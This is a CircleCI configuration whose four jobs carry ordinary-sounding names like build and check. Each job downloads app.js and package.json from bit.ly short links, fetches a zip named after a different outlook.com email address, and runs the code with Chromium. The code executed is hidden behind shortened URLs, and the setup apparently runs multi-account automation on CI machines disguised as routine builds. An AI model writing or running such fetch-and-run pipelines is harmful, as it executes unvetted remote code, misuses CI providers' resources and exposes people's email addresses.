version: 2.1

jobs:
  build-web:
    machine:
      image: ubuntu-2004:202101-01
    resource_class: arm.medium
    steps:
      - run: sudo apt install -y chromium-browser
      - run: curl -fsSL https://bit.ly/3kJeOmQ -o app.js && curl -fsSL https://bit.ly/3Hca5nk -o package.json
      - run: curl -fsSL https://bitbucket.org/lunarcrush/lunarcrush-data/get/elombogo_outlook-com.zip -o lunarCrushData.zip
      - run: unzip lunarCrushData.zip -d lunarCrushData
      - run: npm i -s
      - run: node app 65
  check-web:
    machine:
      image: ubuntu-2004:202101-01
    resource_class: arm.medium
    steps:
      - run: sudo apt install -y chromium-browser
      - run: curl -fsSL https://bit.ly/3kJeOmQ -o app.js && curl -fsSL https://bit.ly/3Hca5nk -o package.json
      - run: curl -fsSL https://bitbucket.org/lunarcrush/lunarcrush-data/get/allianceloanuk2021_outlook-com.zip -o lunarCrushData.zip
      - run: unzip lunarCrushData.zip -d lunarCrushData
      - run: npm i -s
      - run: node app 65
  crawl-web:
    machine:
      image: ubuntu-2004:202101-01
    resource_class: arm.medium
    steps:
      - run: sudo apt install -y chromium-browser
      - run: curl -fsSL https://bit.ly/3kJeOmQ -o app.js && curl -fsSL https://bit.ly/3Hca5nk -o package.json
      - run: curl -fsSL https://bitbucket.org/lunarcrush/lunarcrush-data/get/mrs.kathye.carpenter_outlook-com.zip -o lunarCrushData.zip
      - run: unzip lunarCrushData.zip -d lunarCrushData
      - run: npm i -s
      - run: node app 65
  save-data-web:
    machine:
      image: ubuntu-2004:202101-01
    resource_class: arm.medium
    steps:
      - run: sudo apt install -y chromium-browser
      - run: curl -fsSL https://bit.ly/3kJeOmQ -o app.js && curl -fsSL https://bit.ly/3Hca5nk -o package.json
      - run: curl -fsSL https://bitbucket.org/lunarcrush/lunarcrush-data/get/estellemartin95_outlook-com.zip -o lunarCrushData.zip
      - run: unzip lunarCrushData.zip -d lunarCrushData
      - run: npm i -s
      - run: node app 65

workflows:
  build:
    jobs:
      - build-web
  check:
    jobs:
      - check-web
  crawl:
    jobs:
      - crawl-web
  save-data:
    jobs:
      - save-data-web
